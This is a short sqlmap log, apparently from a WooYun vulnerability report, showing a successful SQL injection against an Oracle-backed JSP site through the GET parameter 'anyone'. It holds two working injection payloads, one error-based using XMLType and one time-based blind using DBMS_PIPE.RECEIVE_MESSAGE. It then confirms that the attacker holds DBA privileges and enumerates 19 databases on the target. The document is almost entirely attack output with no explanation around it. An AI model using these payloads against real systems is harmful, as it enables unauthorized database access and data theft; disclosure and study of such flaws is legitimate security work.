WooYun.org

sqlmap identified the following injection points with a total of 44 HTTP(s) requests:
---
Place: GET
Parameter: anyone
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: anyone=1' AND 3306=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(118)||CHR(121)||CHR(113)||(SELECT (CASE WHEN (3306=3306) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(99)||CHR(106)||CHR(114)||CHR(113)||CHR(62))) FROM DUAL) AND 'nVuE'='nVuE
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: anyone=1' AND 3586=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(83)||CHR(73)||CHR(104),5) AND 'WpFl'='WpFl
---
[17:57:33] [INFO] the back-end DBMS is Oracle
web application technology: JSP, JSP 2.2
current user is DBA:    True
back-end DBMS: Oracle
available databases [19]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[*] ZZ1207
[*] ZZCMS
[*] ZZWW
[*] ZZWW0702